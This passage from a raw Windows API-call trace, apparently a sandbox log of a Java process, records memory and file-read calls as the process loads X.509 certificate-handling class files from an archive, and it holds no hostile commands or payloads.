lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6b0, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c6b0*=0xa0, lpOverlapped=0x0) returned 1 [0118.066] malloc (_Size=0x37) returned 0x12ef48d0 [0118.066] strlen (_Str="sun/security/x509/CRLDistributionPointsExtension.class") returned 0x36 [0118.066] strcpy (in: _Dest=0x208c860, _Source="sun/security/x509/CRLDistributionPointsExtension.class" | out: _Dest="sun/security/x509/CRLDistributionPointsExtension.class") returned="sun/security/x509/CRLDistributionPointsExtension.class" [0118.066] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297ea38, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=43510328) returned 1 [0118.066] ReadFile (in: hFile=0x134, lpBuffer=0x208c330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x208c330*, lpNumberOfBytesRead=0x208c2b0*=0x1e, lpOverlapped=0x0) returned 1 [0118.066] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x297ea8c, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=43510412) returned 1 [0118.066] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0x132f, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208c310*=0x132f, lpOverlapped=0x0) returned 1 [0118.067] free (_Block=0x12e66550) [0118.068] free (_Block=0x12e603c0) [0118.077] strlen (_Str="sun/security/x509/DistributionPoint.class") returned 0x29 [0118.077] malloc (_Size=0x48) returned 0x12e60370 [0118.078] malloc (_Size=0xa0) returned 0x12dac650 [0118.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4bec, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=54414316) returned 1 [0118.078] ReadFile (in: hFile=0x134, lpBuffer=0x12dac650, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x12dac650*, lpNumberOfBytesRead=0x208b940*=0xa0, lpOverlapped=0x0) returned 1 [0118.078] malloc (_Size=0x2a) returned 0x12ef4790 [0118.078] strlen (_Str="sun/security/x509/DistributionPoint.class") returned 0x29 [0118.078] strcpy (in: _Dest=0x208baf0, _Source="sun/security/x509/DistributionPoint.class" | out: _Dest="sun/security/x509/DistributionPoint.class") returned="sun/security/x509/DistributionPoint.class" [0118.078] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x298e52b, lpNewFilePointer=0x208b570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b570*=43574571) returned 1 [0118.078] ReadFile (in: hFile=0x134, lpBuffer=0x208b5c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b540, lpOverlapped=0x0 | out: lpBuffer=0x208b5c0*, lpNumberOfBytesRead=0x208b540*=0x1e, lpOverlapped=0x0) returned 1 [0118.080] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x298e572, lpNewFilePointer=0x208b5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5d0*=43574642) returned 1 [0118.080] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0x13c2, lpNumberOfBytesRead=0x208b5a0, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208b5a0*=0x13c2, lpOverlapped=0x0) returned 1 [0118.081] free (_Block=0x12ef48d0) [0118.081] free (_Block=0x12e602d0) [0118.089] strlen (_Str="sun/security/x509/URIName.class") returned 0x1f [0118.089] malloc (_Size=0x48) returned 0x12e60780 [0118.089] malloc (_Size=0xa0) returned 0x12dab260 [0118.089] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5907, lpNewFilePointer=0x208b7a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b7a0*=54417671) returned 1 [0118.089] ReadFile (in: hFile=0x134, lpBuffer=0x12dab260, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b770, lpOverlapped=0x0 | out: lpBuffer=0x12dab260*, lpNumberOfBytesRead=0x208b770*=0xa0, lpOverlapped=0x0) returned 1 [0118.089] malloc (_Size=0x20) returned 0x12e66a90 [0118.090] strlen (_Str="sun/security/x509/URIName.class") returned 0x1f [0118.090] strcpy (in: _Dest=0x208b920, _Source="sun/security/x509/URIName.class" | out: _Dest="sun/security/x509/URIName.class") returned="sun/security/x509/URIName.class" [0118.090] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29b1876, lpNewFilePointer=0x208b3a0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b3a0*=43718774) returned 1 [0118.090] ReadFile (in: hFile=0x134, lpBuffer=0x208b3f0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b370, lpOverlapped=0x0 | out: lpBuffer=0x208b3f0*, lpNumberOfBytesRead=0x208b370*=0x1e, lpOverlapped=0x0) returned 1 [0118.090] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29b18b3, lpNewFilePointer=0x208b400, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b400*=43718835) returned 1 [0118.090] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0xec2, lpNumberOfBytesRead=0x208b3d0, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208b3d0*=0xec2, lpOverlapped=0x0) returned 1 [0118.091] free (_Block=0x12ef4790) [0118.092] free (_Block=0x12e60370) [0118.097] malloc (_Size=0x48) returned 0x12e609b0 [0118.097] malloc (_Size=0xa0) returned 0x12daaef0 [0118.097] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4b3f, lpNewFilePointer=0x208b6c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b6c0*=54414143) returned 1 [0118.097] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b690, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208b690*=0xa0, lpOverlapped=0x0) returned 1 [0118.097] malloc (_Size=0x20) returned 0x12e66520 [0118.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x298d464, lpNewFilePointer=0x208b2c0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b2c0*=43570276) returned 1 [0118.098] ReadFile (in: hFile=0x134, lpBuffer=0x208b310, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b290, lpOverlapped=0x0 | out: lpBuffer=0x208b310*, lpNumberOfBytesRead=0x208b290*=0x1e, lpOverlapped=0x0) returned 1 [0118.098] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x298d4a1, lpNewFilePointer=0x208b320, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b320*=43570337) returned 1 [0118.098] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0xb48, lpNumberOfBytesRead=0x208b2f0, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208b2f0*=0xb48, lpOverlapped=0x0) returned 1 [0118.099] strlen (_Str="sun/security/x509/ExtendedKeyUsageExtension") returned 0x2b [0118.100] strlen (_Str="sun/security/x509/ExtendedKeyUsageExtension.class") returned 0x31 [0118.100] malloc (_Size=0x48) returned 0x12e60aa0 [0118.100] malloc (_Size=0xa0) returned 0x12dab100 [0118.100] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4cf0, lpNewFilePointer=0x208c6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6e0*=54414576) returned 1 [0118.100] ReadFile (in: hFile=0x134, lpBuffer=0x12dab100, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6b0, lpOverlapped=0x0 | out: lpBuffer=0x12dab100*, lpNumberOfBytesRead=0x208c6b0*=0xa0, lpOverlapped=0x0) returned 1 [0118.100] malloc (_Size=0x32) returned 0x12ef4fd0 [0118.101] strlen (_Str="sun/security/x509/ExtendedKeyUsageExtension.class") returned 0x31 [0118.101] strcpy (in: _Dest=0x208c860, _Source="sun/security/x509/ExtendedKeyUsageExtension.class" | out: _Dest="sun/security/x509/ExtendedKeyUsageExtension.class") returned="sun/security/x509/ExtendedKeyUsageExtension.class" [0118.102] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2990f39, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=43585337) returned 1 [0118.102] ReadFile (in: hFile=0x134, lpBuffer=0x208c330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x208c330*, lpNumberOfBytesRead=0x208c2b0*=0x1e, lpOverlapped=0x0) returned 1 [0118.106] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2990f88, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=43585416) returned 1 [0118.106] ReadFile (in: hFile=0x134, lpBuffer=0x12eb1d20, nNumberOfBytesToRead=0x18a2, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x12eb1d20*, lpNumberOfBytesRead=0x208c310*=0x18a2, lpOverlapped=0x0) returned 1 [0118.107] free (_Block=0x12e66520) [0118.107] free (_Block=0x12e609b0) [0118.138] GetFileType (hFile=0x2d4) returned 0x1 [0118.138] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208d3d0*=8192) returned 1 [0118.138] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x208d3e0 | out: lpFileSize=0x208d3e0*=114757) returned 1 [0118.139] ReadFile (in: hFile=0x2d4, lpBuffer=0x208b210, nNumberOfBytesToRead=0x2000, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x208b210*, lpNumberOfBytesRead=0x208b1e0*=0x2000, lpOverlapped=0x0) returned 1 [0118.251] GetFileType (hFile=0x2d4) returned 0x1 [0118.251] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208d3d0*=16384) returned 1 [0118.251] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x208d3e0 | out: lpFileSize=0x208d3e0*=114757) returned 1 [0118.253] malloc (_Size=0x4000) returned 0x12dd4010 [0118.254] ReadFile (in: hFile=0x2d4, lpBuffer=0x12dd4010, nNumberOfBytesToRead=0x4000, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x12dd4010*, lpNumberOfBytesRead=0x208b1e0*=0x4000, lpOverlapped=0x0) returned 1 [0118.254] free (_Block=0x12dd4010) [0118.353] strlen (_Str="sun/security/x509/CertificatePoliciesExtension") returned 0x2e [0118.354] strlen (_Str="sun/security/x509/CertificatePoliciesExtension.class") returned 0x34 [0118.354] malloc (_Size=0x48) returned 0x12e60780 [0118.354] malloc (_Size=0xa0) returned 0x12daaef0 [0118.354] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e480e, lpNewFilePointer=0x208c6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6e0*=54413326) returned 1 [0118.354] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6b0, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c6b0*=0xa0, lpOverlapped=0x0) returned 1 [0118.354] malloc (_Size=0x35) returned 0x12ef4dd0 [0118.354] strlen (_Str="sun/security/x509/CertificatePoliciesExtension.class") returned 0x34 [0118.355] strcpy (in: _Dest=0x208c860, _Source="sun/security/x509/CertificatePoliciesExtension.class" | out: _Dest="sun/security/x509/CertificatePoliciesExtension.class") returned="sun/security/x509/CertificatePoliciesExtension.class" [0118.355] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29876af, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=43546287) returned 1 [0118.355] ReadFile (in: hFile=0x134, lpBuffer=0x208c330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x208c330*, lpNumberOfBytesRead=0x208c2b0*=0x1e, lpOverlapped=0x0) returned 1 [0118.355] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2987701, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=43546369) returned 1 [0118.356] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x1078, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208c310*=0x1078, lpOverlapped=0x0) returned 1 [0118.357] free (_Block=0x12ef4fd0) [0118.357] free (_Block=0x12e60aa0) [0118.367] strlen (_Str="sun/security/x509/PolicyInformation.class") returned 0x29 [0118.367] malloc (_Size=0x48) returned 0x12e60b90 [0118.367] malloc (_Size=0xa0) returned 0x12dac9c0 [0118.367] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5591, lpNewFilePointer=0x208b9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9f0*=54416785) returned 1 [0118.367] ReadFile (in: hFile=0x134, lpBuffer=0x12dac9c0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b9c0, lpOverlapped=0x0 | out: lpBuffer=0x12dac9c0*, lpNumberOfBytesRead=0x208b9c0*=0xa0, lpOverlapped=0x0) returned 1 [0118.368] malloc (_Size=0x2a) returned 0x12ef5410 [0118.368] strlen (_Str="sun/security/x509/PolicyInformation.class") returned 0x29 [0118.368] strcpy (in: _Dest=0x208bb70, _Source="sun/security/x509/PolicyInformation.class" | out: _Dest="sun/security/x509/PolicyInformation.class") returned="sun/security/x509/PolicyInformation.class" [0118.368] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29a821b, lpNewFilePointer=0x208b5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5f0*=43680283) returned 1 [0118.368] ReadFile (in: hFile=0x134, lpBuffer=0x208b640, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b5c0, lpOverlapped=0x0 | out: lpBuffer=0x208b640*, lpNumberOfBytesRead=0x208b5c0*=0x1e, lpOverlapped=0x0) returned 1 [0118.369] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29a8262, lpNewFilePointer=0x208b650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b650*=43680354) returned 1 [0118.369] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x1185, lpNumberOfBytesRead=0x208b620, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208b620*=0x1185, lpOverlapped=0x0) returned 1 [0118.370] free (_Block=0x12ef4dd0) [0118.371] free (_Block=0x12e60780) [0118.381] strlen (_Str="sun/security/x509/CertificatePolicyId.class") returned 0x2b [0118.381] malloc (_Size=0x48) returned 0x12e60cd0 [0118.381] malloc (_Size=0xa0) returned 0x12dab890 [0118.381] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e4870, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=54413424) returned 1 [0118.381] ReadFile (in: hFile=0x134, lpBuffer=0x12dab890, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x12dab890*, lpNumberOfBytesRead=0x208b940*=0xa0, lpOverlapped=0x0) returned 1 [0118.381] malloc (_Size=0x2c) returned 0x12ef46d0 [0118.381] strlen (_Str="sun/security/x509/CertificatePolicyId.class") returned 0x2b [0118.382] strcpy (in: _Dest=0x208baf0, _Source="sun/security/x509/CertificatePolicyId.class" | out: _Dest="sun/security/x509/CertificatePolicyId.class") returned="sun/security/x509/CertificatePolicyId.class" [0118.382] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2988779, lpNewFilePointer=0x208b570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b570*=43550585) returned 1 [0118.382] ReadFile (in: hFile=0x134, lpBuffer=0x208b5c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b540, lpOverlapped=0x0 | out: lpBuffer=0x208b5c0*, lpNumberOfBytesRead=0x208b540*=0x1e, lpOverlapped=0x0) returned 1 [0118.382] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29887c2, lpNewFilePointer=0x208b5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5d0*=43550658) returned 1 [0118.382] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x47c, lpNumberOfBytesRead=0x208b5a0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208b5a0*=0x47c, lpOverlapped=0x0) returned 1 [0118.382] free (_Block=0x12ef5410) [0118.383] free (_Block=0x12e60b90) [0118.389] strlen (_Str="java/security/cert/PolicyQualifierInfo.class") returned 0x2c [0118.390] malloc (_Size=0x48) returned 0x12e60b90 [0118.390] malloc (_Size=0xa0) returned 0x12daace0 [0118.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x3333b2b, lpNewFilePointer=0x208b970, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b970*=53689131) returned 1 [0118.390] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b940, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b940*=0xa0, lpOverlapped=0x0) returned 1 [0118.390] malloc (_Size=0x2d) returned 0x12ef48d0 [0118.390] strlen (_Str="java/security/cert/PolicyQualifierInfo.class") returned 0x2c [0118.390] strcpy (in: _Dest=0x208baf0, _Source="java/security/cert/PolicyQualifierInfo.class" | out: _Dest="java/security/cert/PolicyQualifierInfo.class") returned="java/security/cert/PolicyQualifierInfo.class" [0118.390] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17a5383, lpNewFilePointer=0x208b570, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b570*=24793987) returned 1 [0118.391] ReadFile (in: hFile=0x134, lpBuffer=0x208b5c0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b540, lpOverlapped=0x0 | out: lpBuffer=0x208b5c0*, lpNumberOfBytesRead=0x208b540*=0x1e, lpOverlapped=0x0) returned 1 [0118.391] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x17a53cd, lpNewFilePointer=0x208b5d0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5d0*=24794061) returned 1 [0118.391] ReadFile (in: hFile=0x134, lpBuffer=0x12e91d60, nNumberOfBytesToRead=0x764, lpNumberOfBytesRead=0x208b5a0, lpOverlapped=0x0 | out: lpBuffer=0x12e91d60*, lpNumberOfBytesRead=0x208b5a0*=0x764, lpOverlapped=0x0) returned 1 [0118.391] free (_Block=0x12ef46d0) [0118.391] free (_Block=0x12e60cd0) [0118.486] GetFileType (hFile=0x2d4) returned 0x1 [0118.486] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208d3d0*=32768) returned 1 [0118.486] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x208d3e0 | out: lpFileSize=0x208d3e0*=114757) returned 1 [0118.487] malloc (_Size=0x8000) returned 0x12dd62e0 [0118.487] ReadFile (in: hFile=0x2d4, lpBuffer=0x12dd62e0, nNumberOfBytesToRead=0x8000, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x12dd62e0*, lpNumberOfBytesRead=0x208b1e0*=0x8000, lpOverlapped=0x0) returned 1 [0118.488] free (_Block=0x12dd62e0) [0118.576] strlen (_Str="sun/security/x509/IssuerAlternativeNameExtension") returned 0x30 [0118.577] strlen (_Str="sun/security/x509/IssuerAlternativeNameExtension.class") returned 0x36 [0118.577] malloc (_Size=0x48) returned 0x12e60910 [0118.577] malloc (_Size=0xa0) returned 0x12daace0 [0118.577] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e50ad, lpNewFilePointer=0x208c6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6e0*=54415533) returned 1 [0118.577] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6b0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208c6b0*=0xa0, lpOverlapped=0x0) returned 1 [0118.577] malloc (_Size=0x37) returned 0x12ef4cd0 [0118.578] strlen (_Str="sun/security/x509/IssuerAlternativeNameExtension.class") returned 0x36 [0118.578] strcpy (in: _Dest=0x208c860, _Source="sun/security/x509/IssuerAlternativeNameExtension.class" | out: _Dest="sun/security/x509/IssuerAlternativeNameExtension.class") returned="sun/security/x509/IssuerAlternativeNameExtension.class" [0118.578] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x299a539, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=43623737) returned 1 [0118.578] ReadFile (in: hFile=0x134, lpBuffer=0x208c330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x208c330*, lpNumberOfBytesRead=0x208c2b0*=0x1e, lpOverlapped=0x0) returned 1 [0118.579] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x299a58d, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=43623821) returned 1 [0118.579] ReadFile (in: hFile=0x134, lpBuffer=0x12e99d50, nNumberOfBytesToRead=0xe7b, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x12e99d50*, lpNumberOfBytesRead=0x208c310*=0xe7b, lpOverlapped=0x0) returned 1 [0118.584] free (_Block=0x12ef48d0) [0118.584] free (_Block=0x12e60b90) [0118.641] strlen (_Str="sun/reflect/ConstructorAccessorImpl") returned 0x23 [0118.699] GetFileType (hFile=0x2d4) returned 0x1 [0118.699] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x208d3d0, dwMoveMethod=0x1 | out: lpNewFilePointer=0x208d3d0*=65536) returned 1 [0118.699] GetFileSizeEx (in: hFile=0x2d4, lpFileSize=0x208d3e0 | out: lpFileSize=0x208d3e0*=114757) returned 1 [0118.701] malloc (_Size=0x10000) returned 0x12de0c50 [0118.701] ReadFile (in: hFile=0x2d4, lpBuffer=0x12de0c50, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x208b1e0, lpOverlapped=0x0 | out: lpBuffer=0x12de0c50*, lpNumberOfBytesRead=0x208b1e0*=0xc045, lpOverlapped=0x0) returned 1 [0118.702] free (_Block=0x12de0c50) [0118.745] strlen (_Str="sun/security/x509/PolicyMappingsExtension") returned 0x29 [0118.745] strlen (_Str="sun/security/x509/PolicyMappingsExtension.class") returned 0x2f [0118.745] malloc (_Size=0x48) returned 0x12e60190 [0118.745] malloc (_Size=0xa0) returned 0x12daaef0 [0118.745] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e55e8, lpNewFilePointer=0x208c6e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c6e0*=54416872) returned 1 [0118.745] ReadFile (in: hFile=0x134, lpBuffer=0x12daaef0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c6b0, lpOverlapped=0x0 | out: lpBuffer=0x12daaef0*, lpNumberOfBytesRead=0x208c6b0*=0xa0, lpOverlapped=0x0) returned 1 [0118.745] malloc (_Size=0x30) returned 0x12ef48d0 [0118.746] strlen (_Str="sun/security/x509/PolicyMappingsExtension.class") returned 0x2f [0118.746] strcpy (in: _Dest=0x208c860, _Source="sun/security/x509/PolicyMappingsExtension.class" | out: _Dest="sun/security/x509/PolicyMappingsExtension.class") returned="sun/security/x509/PolicyMappingsExtension.class" [0118.746] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29a93e7, lpNewFilePointer=0x208c2e0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c2e0*=43684839) returned 1 [0118.746] ReadFile (in: hFile=0x134, lpBuffer=0x208c330, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c2b0, lpOverlapped=0x0 | out: lpBuffer=0x208c330*, lpNumberOfBytesRead=0x208c2b0*=0x1e, lpOverlapped=0x0) returned 1 [0118.746] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29a9434, lpNewFilePointer=0x208c340, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c340*=43684916) returned 1 [0118.746] ReadFile (in: hFile=0x134, lpBuffer=0x12d39720, nNumberOfBytesToRead=0xf7b, lpNumberOfBytesRead=0x208c310, lpOverlapped=0x0 | out: lpBuffer=0x12d39720*, lpNumberOfBytesRead=0x208c310*=0xf7b, lpOverlapped=0x0) returned 1 [0118.747] free (_Block=0x12ef4cd0) [0118.747] free (_Block=0x12e60910) [0118.755] strlen (_Str="sun/security/x509/CertificatePolicyMap.class") returned 0x2c [0118.755] malloc (_Size=0x48) returned 0x12e602d0 [0118.755] malloc (_Size=0xa0) returned 0x12daace0 [0118.755] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e48c9, lpNewFilePointer=0x208b9f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b9f0*=54413513) returned 1 [0118.755] ReadFile (in: hFile=0x134, lpBuffer=0x12daace0, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208b9c0, lpOverlapped=0x0 | out: lpBuffer=0x12daace0*, lpNumberOfBytesRead=0x208b9c0*=0xa0, lpOverlapped=0x0) returned 1 [0118.755] malloc (_Size=0x2d) returned 0x12ef4c10 [0118.755] strlen (_Str="sun/security/x509/CertificatePolicyMap.class") returned 0x2c [0118.755] strcpy (in: _Dest=0x208bb70, _Source="sun/security/x509/CertificatePolicyMap.class" | out: _Dest="sun/security/x509/CertificatePolicyMap.class") returned="sun/security/x509/CertificatePolicyMap.class" [0118.755] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2988c3e, lpNewFilePointer=0x208b5f0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b5f0*=43551806) returned 1 [0118.755] ReadFile (in: hFile=0x134, lpBuffer=0x208b640, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208b5c0, lpOverlapped=0x0 | out: lpBuffer=0x208b640*, lpNumberOfBytesRead=0x208b5c0*=0x1e, lpOverlapped=0x0) returned 1 [0118.755] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x2988c88, lpNewFilePointer=0x208b650, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208b650*=43551880) returned 1 [0118.756] ReadFile (in: hFile=0x134, lpBuffer=0x12d39720, nNumberOfBytesToRead=0x626, lpNumberOfBytesRead=0x208b620, lpOverlapped=0x0 | out: lpBuffer=0x12d39720*, lpNumberOfBytesRead=0x208b620*=0x626, lpOverlapped=0x0) returned 1 [0118.756] free (_Block=0x12ef48d0) [0118.757] free (_Block=0x12e60190) [0118.786] strlen (_Str="sun/security/x509/PrivateKeyUsageExtension") returned 0x2a [0118.787] strlen (_Str="sun/security/x509/PrivateKeyUsageExtension.class") returned 0x30 [0118.787] malloc (_Size=0x48) returned 0x12e60730 [0118.787] malloc (_Size=0xa0) returned 0x12dabd60 [0118.787] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x33e5645, lpNewFilePointer=0x208c660, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c660*=54416965) returned 1 [0118.787] ReadFile (in: hFile=0x134, lpBuffer=0x12dabd60, nNumberOfBytesToRead=0xa0, lpNumberOfBytesRead=0x208c630, lpOverlapped=0x0 | out: lpBuffer=0x12dabd60*, lpNumberOfBytesRead=0x208c630*=0xa0, lpOverlapped=0x0) returned 1 [0118.787] malloc (_Size=0x31) returned 0x12ef5590 [0118.787] strlen (_Str="sun/security/x509/PrivateKeyUsageExtension.class") returned 0x30 [0118.788] strcpy (in: _Dest=0x208c7e0, _Source="sun/security/x509/PrivateKeyUsageExtension.class" | out: _Dest="sun/security/x509/PrivateKeyUsageExtension.class") returned="sun/security/x509/PrivateKeyUsageExtension.class" [0118.788] SetFilePointerEx (in: hFile=0x134, liDistanceToMove=0x29aa3af, lpNewFilePointer=0x208c260, dwMoveMethod=0x0 | out: lpNewFilePointer=0x208c260*=43688879) returned 1 [0118.788] ReadFile (in: hFile=0x134, lpBuffer=0x208c2b0, nNumberOfBytesToRead=0x1e, lpNumberOfBytesRead=0x208c230, lpOverlapped=0x0 | out: lpBuffer=0x208c2b0*, lpNumberOfBytesRead=0x208c230*=0x1e, lpOverlapped=0x0) returned 1 [0118.788] SetFilePointerEx (in: hFile=0x134, 